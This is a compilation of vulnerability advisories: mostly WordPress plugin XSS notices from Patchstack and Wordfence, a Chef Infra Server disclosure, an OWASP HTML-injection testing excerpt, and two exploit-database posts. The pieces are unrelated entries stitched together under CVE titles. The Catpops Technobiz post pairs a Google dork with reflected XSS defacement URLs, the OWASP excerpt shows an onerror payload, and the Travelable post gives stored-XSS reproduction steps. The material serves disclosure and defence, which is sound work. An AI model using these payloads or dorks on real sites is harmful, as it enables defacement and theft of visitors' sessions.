Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in WeSecur Security plugin <= 1.2.1 versions.

**Solution**

 No fix

No patched version is available. This plugin has been closed as of February 21, 2023 and is not available for download. This closure is permanent. Reason: Author Request.

Prasanna V Balaji discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WeSecur Security Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-24390: WordPress WeSecur Security plugin <= 1.2.1 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Repute InfoSystems ARMember (free), Repute InfoSystems ARMember (premium) plugins.

**Solution**

 Fixed

Update the WordPress ARMember plugin to the latest available version (at least 4.0.5).

Cat discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress ARMember Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 4.0.5.

**Other vulnerabilities in this plugin**

 0 present

 7 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2022-47421: WordPress ARMember plugin <= 4.0.4 - Stored Cross Site Scripting (XSS) on Common Messages Settings - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in CRUDLab Jazz Popups plugin <= 1.8.7 versions.

**Solution**

 No fix

No patched version is available. No reply from the vendor.

Found this useful? Thank thiennv for reporting this vulnerability. Buy a coffee ☕

thiennv discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Jazz Popups Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 2 present

 0 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-32965: WordPress Jazz Popups plugin <= 1.8.7 - Cross Site Scripting (XSS) vulnerability - Patchstack

Catpops Technobiz CMS version 4.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Catpops Technobiz CMS v4.0 XSS Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://catpops.in                                                                                                 |  | # Dork      : intext:''Designed By Catpops Technobiz''                                                                           |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /read_article_details.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E[+]  http://127.0.0.1/holyheartsin/read_article_details.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E[+]  http://127.0.0.1/holyheartsin/alumini.php?choice=success&value=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Catpops Technobiz CMS 4.0 Cross Site Scripting

The YARPP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'className' parameter in versions up to, and including, 5.30.3 due to insufficient input sanitization and output escaping. This makes it possible for contributor-level attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Timestamp:

07/17/2023 06:59:01 PM (15 hours ago)

Author:

jeffparker

Message:

tagging version 5.30.4  

File:

  

*   yet-another-related-posts-plugin/trunk/classes/YARPP\_Core.php (modified) (1 diff)

CVE-2023-2433: Changeset 2939617 for yet-another-related-posts-plugin/trunk/classes/YARPP_Core.php – WordPress Plugin Repository

Several themes for WordPress by DeoThemes are vulnerable to Reflected Cross-Site Scripting via breadcrumbs in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

This record contains material that is subject to copyright.

**Copyright 2012-2023 Defiant Inc.**

**License:** Defiant hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute this software vulnerability information. Any copy of the software vulnerability information you make for such purposes is authorized provided that you include a hyperlink to this vulnerability record and reproduce Defiant's copyright designation and this license in any such copy. **Read more.**

**Copyright 1999-2023 The MITRE Corporation**

**License:** CVE Usage: MITRE hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Common Vulnerabilities and Exposures (CVE®). Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy. **Read more.**

Have information to add, or spot any errors? Contact us at wfi-support@wordfence.com so we can make any appropriate adjustments.

CVE-2023-3708: Multiple DeoThemes Themes <= (Various Versions) - Reflected Cross-Site Scripting — Wordfence Intelligence

Progress Chef Infra Server before 15.7 allows a local attacker to exploit a /var/opt/opscode/local-mode-cache/backup world-readable temporary backup path to access sensitive information, resulting in the disclosure of all indexed node data, because OpenSearch credentials are exposed. (The data typically includes credentials for additional systems.) The attacker must wait for an admin to run the "chef-server-ctl reconfigure" command.

CVE-2023-28864: Chef Infra Server Release Notes

Furukawa 423-41W/AC before v1.1.4 and LD421-21W before v1.3.3 were discovered to contain an HTML injection vulnerability via the serial number update function.

**Testing for HTML Injection**

ID

WSTG-CLNT-03

**Summary**

HTML injection is a type of injection vulnerability that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user’s session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

This vulnerability occurs when user input is not correctly sanitized and the output is not encoded. An injection allows the attacker to send a malicious HTML page to a victim. The targeted browser will not be able to distinguish (trust) legitimate parts from malicious parts of the page, and consequently will parse and execute the whole page in the victim’s context.

There is a wide range of methods and attributes that could be used to render HTML content. If these methods are provided with an untrusted input, then there is an high risk of HTML injection vulnerability. For example, malicious HTML code can be injected via the innerHTML JavaScript method, usually used to render user-inserted HTML code. If strings are not correctly sanitized, the method can enable HTML injection. A JavaScript function that can be used for this purpose is document.write().

The following example shows a snippet of vulnerable code that allows an unvalidated input to be used to create dynamic HTML in the page context:

    var userposition=location.href.indexOf("user=");
    var user=location.href.substring(userposition+5);
    document.getElementById("Welcome").innerHTML=" Hello, "+user;
    

The following example shows vulnerable code using the document.write() function:

    var userposition=location.href.indexOf("user=");
    var user=location.href.substring(userposition+5);
    document.write("<h1>Hello, " + user +"</h1>");
    

In both examples, this vulnerability can be exploited with an input such as:

    http://vulnerable.site/page.html?user=<img%20src='aaa'%20onerror=alert(1)>
    

This input will add an image tag to the page that will execute arbitrary JavaScript code inserted by the malicious user in the HTML context.

**Test Objectives**

*   Identify HTML injection points and assess the severity of the injected content.

**How to Test**

Consider the following DOM XSS exercise http://www.domxss.com/domxss/01\_Basics/06\_jquery\_old\_html.html

The HTML code contains the following script:

    <script src="../js/jquery-1.7.1.js"></script>
    <script>
    function setMessage(){
        var t=location.hash.slice(1);
        $("div[id="+t+"]").text("The DOM is now loaded and can be manipulated.");
    }
    $(document).ready(setMessage  );
    $(window).bind("hashchange",setMessage)
    </script>
    <body>
        <script src="../js/embed.js"></script>
        <span><a href="#message" > Show Here</a><div id="message">Showing Message1</div></span>
        <span><a href="#message1" > Show Here</a><div id="message1">Showing Message2</div>
        <span><a href="#message2" > Show Here</a><div id="message2">Showing Message3</div>
    </body>
    

It is possible to inject HTML code.

CVE-2021-37386: WSTG - Latest | OWASP Foundation

Cross Site Scripting (XSS) vulnerability in Jaegertracing Jaeger UI before v.1.31.0 allows a remote attacker to execute arbitrary code via the KeyValuesTable component.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-36656: Escape keys by yurishkuro · Pull Request #15 · mafintosh/json-markup

Travelable version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Travelable 1.0 - Stored XSS# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: travelmate.com# Vendor Homepage: https://www.codester.com/items/43963/travelable-trek-management-solution# Software Link: https://travel.codeswithbipin.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /[random-number]/commentPOST parameter 'comment' is vulnerable to XSS-----------------------------------------------------------POST /[random-number]/comment HTTP/2_token=10Mh1zuuVXB1iH3QsrEOqpWGOXogEv38WPwqGtv6&name=cracker+infosec&email=cracker%40infosec.com&phone=%2B96171951951&comment=[XSS Payload]-----------------------------------------------------------## Steps to Reproduce:1. Surf as a (Guest User)2. Go to [Tour Packages] on this Path: https://website/packages3. Choose any package and click [Explore] Path: https://website/package/64. Scroll Down to the [Comments] section5. Inject your XSS Payload in [Comment Box]6. Click on [Submit]7. Every visitor to the page where you inject your [XSS Payload] - Path: https://website/package/68. XSS will fire and execute on his browser.[-] Done

Tag

#xss